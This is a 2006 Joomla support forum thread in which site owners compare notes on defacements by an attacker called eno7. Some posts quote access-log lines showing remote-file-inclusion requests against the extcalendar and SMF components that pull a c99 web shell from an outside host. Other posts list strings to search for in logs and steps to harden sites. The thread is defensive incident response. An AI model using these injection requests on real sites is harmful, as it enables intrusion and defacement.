Joomla/MamboHacked Sites By eno7

Discussion regarding Joomla! security issues.

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Maggles
Joomla! Apprentice
Joomla! Apprentice
Posts: 7
Joined: Mon Aug 22, 2005 12:36 am

Joomla/MamboHacked Sites By eno7

Post by Maggles » Mon Jul 10, 2006 12:01 pm

I had a look here:

http://www.[ ** removed hacker's list (kudos) **]/component/option, ... no7/page,1

Because this person has hacked my site twice in the last 2 days. There seems to be a lot of joomla/mambo sites on the list of reported attacks of sites he's hacked and I wondered if anyone has any idea how this guy is getting in. There must be a common component, module or mambot that he's using.

Does anyone have any ideas?

Mike G.
Joomla! Apprentice
Joomla! Apprentice
Posts: 5
Joined: Mon Jul 10, 2006 11:57 am

Re: Joomla/MamboHacked Sites By eno7

Post by Mike G. » Mon Jul 10, 2006 12:07 pm

We were also hacked by this guy ...

Are you running phpBB component (1.2.4 RC5) on your Joomla! site ?

Regards,

Mike

Maggles
Joomla! Apprentice
Joomla! Apprentice
Posts: 7
Joined: Mon Aug 22, 2005 12:36 am

Re: Joomla/MamboHacked Sites By eno7

Post by Maggles » Mon Jul 10, 2006 12:19 pm

Mike G. wrote:
We were also hacked by this guy ...

Are you running phpBB component (1.2.4 RC5) on your Joomla! site ?

Regards,

Mike
We used to have a phpBB forum but changed it to vBulletin about a year ago but there is still a phpbb component installed - my other half is the techie and he did tell me why at the weekend that we can't remove it but I can't remember why right now - I went though removing all components and modules that we don't need/use and removed them as well as updated any to the latest versions etc... and my other half has tried changing settings to make it even more secure but he still got to the site for a second time. Im just glad we take regular backups and save them elsewhere.

User avatar
RobS
Joomla! Ace
Joomla! Ace
Posts: 1366
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Re: Joomla/MamboHacked Sites By eno7

Post by RobS » Mon Jul 10, 2006 12:28 pm

@Maggles,

I have sent you a Personal Message.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

Maggles
Joomla! Apprentice
Joomla! Apprentice
Posts: 7
Joined: Mon Aug 22, 2005 12:36 am

Re: Joomla/MamboHacked Sites By eno7

Post by Maggles » Mon Jul 10, 2006 12:30 pm

RobS wrote: @Maggles,

I have sent you a Personal Message.
Thanks, I've emailed you to the address you supplied.

User avatar
infograf768
Joomla! Master
Joomla! Master
Posts: 19133
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Re: Joomla/MamboHacked Sites By eno7

Post by infograf768 » Mon Jul 10, 2006 1:49 pm

Turk Telecom also for an attack through ext_calendar.
IP 81.215.180.206
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

Mike G.
Joomla! Apprentice
Joomla! Apprentice
Posts: 5
Joined: Mon Jul 10, 2006 11:57 am

Re: Joomla/MamboHacked Sites By eno7

Post by Mike G. » Mon Jul 10, 2006 2:04 pm

The attack to our site came from 81.213.180.37, also a turkish site.

As I found in the logfiles, they used a PHP/BackDoor script infecting the site trough the phpBB download feature !!!

CAUTION! The script resides at this site:  [mod edit: do not post links to viruses. link omited - ChiefGoFor]  and might become active if you follow the link, my virusscanner (McAfee) was detecting it in the browser.

Regards,

Mike
Last edited by ChiefGoFor on Mon Jul 10, 2006 2:25 pm, edited 1 time in total.

User avatar
LorenzoG
Joomla! Hero
Joomla! Hero
Posts: 2983
Joined: Fri Aug 19, 2005 8:46 am
Location: Stockholm, Sweden

Re: Joomla/MamboHacked Sites By eno7

Post by LorenzoG » Mon Jul 10, 2006 2:13 pm

Warning, above link contains a trojan virus script .. as adviced by the poster
Last edited by LorenzoG on Mon Jul 10, 2006 2:23 pm, edited 1 time in total.

Mike G.
Joomla! Apprentice
Joomla! Apprentice
Posts: 5
Joined: Mon Jul 10, 2006 11:57 am

Re: Joomla/MamboHacked Sites By eno7

Post by Mike G. » Mon Jul 10, 2006 3:36 pm

Hmm ... but it might be helpful for other users to know what to search in their logfiles ....  :-\

So look for "eno7" in your logfiles or "c99.txt" to identify whether some of your modules have been also affected by this nasty script.

Regards,

Mike

User avatar
ChiefGoFor
Joomla! Champion
Joomla! Champion
Posts: 5614
Joined: Tue Sep 13, 2005 12:22 am
Location: Omaha, Nebraska, USA
Contact:

Re: Joomla/MamboHacked Sites By eno7

Post by ChiefGoFor » Mon Jul 10, 2006 4:05 pm

Mike G. wrote:
Hmm ... but it might be helpful for other users to know what to search in their logfiles ....  :-\

So look for "eno7" in your logfiles or "c99.txt" to identify whether some of your modules have been also affected by this nasty script.
I agree with you. It was kind of a catch 22 there. Your solution for seaching for those key terms is great! Thank you for the information.
Joomla! ...because open source matters
"Try to answer two questions for every one question you ask." - Me

User avatar
RobS
Joomla! Ace
Joomla! Ace
Posts: 1366
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Re: Joomla/MamboHacked Sites By eno7

Post by RobS » Mon Jul 10, 2006 4:11 pm

Searching for "CONFIG_EXT", "mosConfig_absolute_path" and "mosConfig_live_site" will also reveal some of the recent exploit attempts.
Last edited by RobS on Tue Jul 11, 2006 1:07 am, edited 1 time in total.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

User avatar
CiPHeR
Joomla! Intern
Joomla! Intern
Posts: 51
Joined: Sat Oct 15, 2005 7:07 pm
Location: Ottawa
Contact:

Re: Joomla/MamboHacked Sites By eno7

Post by CiPHeR » Mon Jul 17, 2006 2:16 pm

Our site also got hacked this weekend by this same Eno7 guy - his page over writes your configuration.php file - how do we prevent this from happening again... this is a very serious issue.  I am running the latest Joomla 1.0.10 and VirtueMart 1.0.6 along with SMF RC1.2.  Is there some common denominator that allows this guy easy access to hack Joomla powered sites?  Everything in our root folder of our site is read only, so how did this happen?

Thanks
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net

User avatar
ChiefGoFor
Joomla! Champion
Joomla! Champion
Posts: 5614
Joined: Tue Sep 13, 2005 12:22 am
Location: Omaha, Nebraska, USA
Contact:

Re: Joomla/MamboHacked Sites By eno7

Post by ChiefGoFor » Mon Jul 17, 2006 2:26 pm

To my knowedge, this is not a "Joomla" issue. It is an issue with the components not using some key Joomla Security measures. I think your case, the culprit is SMF.

RobS knows more about it than I do, so I will let him give you a more formal answer.
Joomla! ...because open source matters
"Try to answer two questions for every one question you ask." - Me

anna.y
Joomla! Intern
Joomla! Intern
Posts: 57
Joined: Fri Sep 09, 2005 5:28 am
Contact:

Re: Joomla/MamboHacked Sites By eno7

Post by anna.y » Mon Jul 17, 2006 2:38 pm

What are the practical steps to restore the website.  We've just been hacked through SMF component:

85.108.125.96 - - [17/Jul/2006:08:54:53 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=[EDITED by mod for security reasons]?ls HTTP/1.1" 200 3879 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"
......

And then what are the practical steps to prevent it from recurring

Thank you

Anna
Last edited by infograf768 on Mon Jul 17, 2006 2:49 pm, edited 1 time in total.
Anna
Toronto German Shepherd Dog Rescue
http://www.torontogsdrescue.org

User avatar
infograf768
Joomla! Master
Joomla! Master
Posts: 19133
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Re: Joomla/MamboHacked Sites By eno7

Post by infograf768 » Mon Jul 17, 2006 2:45 pm

Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

anna.y
Joomla! Intern
Joomla! Intern
Posts: 57
Joined: Fri Sep 09, 2005 5:28 am
Contact:

Re: Joomla/MamboHacked Sites By eno7

Post by anna.y » Mon Jul 17, 2006 2:52 pm

Thank you

Anna
Anna
Toronto German Shepherd Dog Rescue
http://www.torontogsdrescue.org

User avatar
CiPHeR
Joomla! Intern
Joomla! Intern
Posts: 51
Joined: Sat Oct 15, 2005 7:07 pm
Location: Ottawa
Contact:

Re: Joomla/MamboHacked Sites By eno7

Post by CiPHeR » Mon Jul 17, 2006 3:32 pm

Thanks...

One question... will that fix prevent this clown from doing this again?
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net

kolle
Joomla! Apprentice
Joomla! Apprentice
Posts: 10
Joined: Tue Aug 30, 2005 1:19 pm
Location: Hamburg

Re: Joomla/MamboHacked Sites By eno7

Post by kolle » Mon Jul 24, 2006 9:22 am

CiPHeR wrote: One question... will that fix prevent this clown from doing this again?
i´d love to know that!
anybody..  :-*

zomertje
Joomla! Apprentice
Joomla! Apprentice
Posts: 17
Joined: Sun Jul 09, 2006 10:41 am

Re: Joomla/MamboHacked Sites By eno7

Post by zomertje » Mon Jul 24, 2006 3:57 pm

Block the IP in the .htaccess file:

deny from xxx.xxx.xxx.xxx

If it comes from the same place
Or disable the component and upgrade :)

Peter Koch
Joomla! Explorer
Joomla! Explorer
Posts: 374
Joined: Thu Aug 18, 2005 8:54 pm

Re: Joomla/MamboHacked Sites By eno7

Post by Peter Koch » Mon Jul 24, 2006 5:42 pm

zomertje wrote: Block the IP in the .htaccess file:

deny from xxx.xxx.xxx.xxx
That wont help since it is a dynamic IP of that provider who is known to support or at least not do anything against hackers (his name not allowed to be told in these forums otherwise you get flamed). The same computer may have another IP next time.

You would need to ban all IP's of that provide. In case you need them PM me and I will send you the whole range.

anna.y
Joomla! Intern
Joomla! Intern
Posts: 57
Joined: Fri Sep 09, 2005 5:28 am
Contact:

Re: Joomla/MamboHacked Sites By eno7

Post by anna.y » Tue Jul 25, 2006 2:25 am

CiPHeR wrote: Thanks...

One question... will that fix prevent this clown from doing this again?
Yes, placing that one line in the insecure files prevented the hacker gaining access to MY website despite literally hundreds of attempts from various IPs from various countries.

Additionally my Server Host turned global_registers to OFF as recommended.

Hope this works for you as well

Anna
Anna
Toronto German Shepherd Dog Rescue
http://www.torontogsdrescue.org

User avatar
rliskey
Joomla! Guru
Joomla! Guru
Posts: 828
Joined: Tue Jun 06, 2006 7:41 am
Location: California, Germany, Norway
Contact:

Re: Joomla/MamboHacked Sites By eno7

Post by rliskey » Tue Jul 25, 2006 3:07 am

I had 7 sites hacked by someone with the same signature. Only three of these sites were Joomla sites. They defaced the index.php file and uploaded a file called "fix.php". If they did more I haven't found it yet.

What all the hacked sites have in common is, 1) they're all at one ISP and 2) they're all using PHP/MySQL.

Seems the exploit could be seeking out ANY poor php code, whether in a Joomla component or in any other script.

If Joomla pros would like log files or other details, contact me.

I'd also appreciate some help. Rebuilding seven sites is an intimidating task, especially since the way they're getting in doesn't appear to be clear yet.

User avatar
rliskey
Joomla! Guru
Joomla! Guru
Posts: 828
Joined: Tue Jun 06, 2006 7:41 am
Location: California, Germany, Norway
Contact:

Re: Joomla/MamboHacked Sites By eno7

Post by rliskey » Tue Jul 25, 2006 5:28 am

Following the trail...

From the log files. Is this how they got in? What might this do?

85.108.122.215 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.xxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.0" 200 18278 http://www.xxxxxxxxxx.com "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "-"

User avatar
infograf768
Joomla! Master
Joomla! Master
Posts: 19133
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Re: Joomla/MamboHacked Sites By eno7

Post by infograf768 » Tue Jul 25, 2006 6:39 am

using the vulnerability in ext-calendar.
You should back-up your db, delete all your root files and reinstall Joomla and the proven corrected components/add-ons.
This is the only way to be sure that all will be OK
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

User avatar
CiPHeR
Joomla! Intern
Joomla! Intern
Posts: 51
Joined: Sat Oct 15, 2005 7:07 pm
Location: Ottawa
Contact:

Re: Joomla/MamboHacked Sites By eno7

Post by CiPHeR » Tue Jul 25, 2006 12:00 pm

anna.y wrote:
CiPHeR wrote: Thanks...

One question... will that fix prevent this clown from doing this again?
Yes, placing that one line in the insecure files prevented the hacker gaining access to MY website despite literally hundreds of attempts from various IPs from various countries.

Additionally my Server Host turned global_registers to OFF as recommended.

Hope this works for you as well

Anna
I dont know why all hosts DONT have register globals=OFF!
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net

User avatar
Elpie
Joomla! Guru
Joomla! Guru
Posts: 903
Joined: Wed Aug 17, 2005 11:26 pm
Contact:

Re: Joomla/MamboHacked Sites By eno7

Post by Elpie » Tue Jul 25, 2006 12:16 pm

CiPHeR wrote: I dont know why all hosts DONT have register globals=OFF!
register_globals is not, in itself, insecure - the problem is that globals is often relied upon by inexperienced developers who are unaware of the issues that can arise with globals if their code is not clean and secure. Because so many scripts rely on register_globals being on, hosts have been reluctant to turn them off (or keep them off if they are running PHP 4.2.0 or higher) - you can imagine the screams from customers if hosts suddenly disabled globals and people had their sites breaking all over the servers!
So, if people do not report to their hosts when sites get hacked, or dont ask their hosts to turn register_globals off, hosts will sit in blissful ignorance thinking their customers are happy with the settings the way they are.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info

anna.y
Joomla! Intern
Joomla! Intern
Posts: 57
Joined: Fri Sep 09, 2005 5:28 am
Contact:

Re: Joomla/MamboHacked Sites By eno7

Post by anna.y » Tue Jul 25, 2006 4:56 pm

infograf768 wrote: using the vulnerability in ext-calendar.
You should back-up your db, delete all your root files and reinstall Joomla and the proven corrected components/add-ons.
This is the only way to be sure that all will be OK
I got hacked through older version of com_SMF and deleting all root files and re-installing everything was NOT an option.

All I had to do in addition to adding the recommended line was check which files were removed or altered by the hacker (two) and simply get those two files from my site backup.

It was rather simple and as I said despite hundreds attempts of hacking I'm having no further problems (keeping my fingers crossed isprobably helping as well...  ;))

Anna 
Anna
Toronto German Shepherd Dog Rescue
http://www.torontogsdrescue.org

omlex
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Wed Aug 09, 2006 8:13 am

Re: Joomla/MamboHacked Sites By eno7

Post by omlex » Wed Aug 09, 2006 8:17 am

How he able to alter the MYSQL db?

berlin
Joomla! Intern
Joomla! Intern
Posts: 76
Joined: Thu Sep 01, 2005 5:41 am

Re: Joomla/MamboHacked Sites By eno7

Post by berlin » Mon Aug 14, 2006 2:46 am

rliskey wrote: Following the trail...

From the log files. Is this how they got in? What might this do?

85.108.122.215 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.xxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.0" 200 18278 http://www.xxxxxxxxxx.com "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "-"
I was hacked by a turkish hacker today.


[

Code: Select all

14-Aug-2006 07:20:22] PHP Warning:  main(http://mi.verizon.net.do/carlos18/therules25.dot): failed to open stream: HTTP request failed! HTTP/1.1 404 Object Not Found
 in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 13
[14-Aug-2006 07:20:22] PHP Warning:  main(): Failed opening 'http://mi.verizon.net.do/carlos18/therules25.dot' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 13
[14-Aug-2006 07:20:22] PHP Warning:  main(): Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 97
i don't know why it shows turx.nl is extcalendar the culprit?
The man who speaks to you of sacrifice speaks of slaves and masters. And intends to be the master. --Ayn Rand

User avatar
infograf768
Joomla! Master
Joomla! Master
Posts: 19133
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Re: Joomla/MamboHacked Sites By eno7

Post by infograf768 » Mon Aug 14, 2006 6:13 am

What you are posting looks like the error log and not the raw logs.

Download and open your rawlogs in an editor to check for GET and "mosconfig" strings so as to figure exactly where they got in.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group


Locked

Return to “Security - 1.0.x”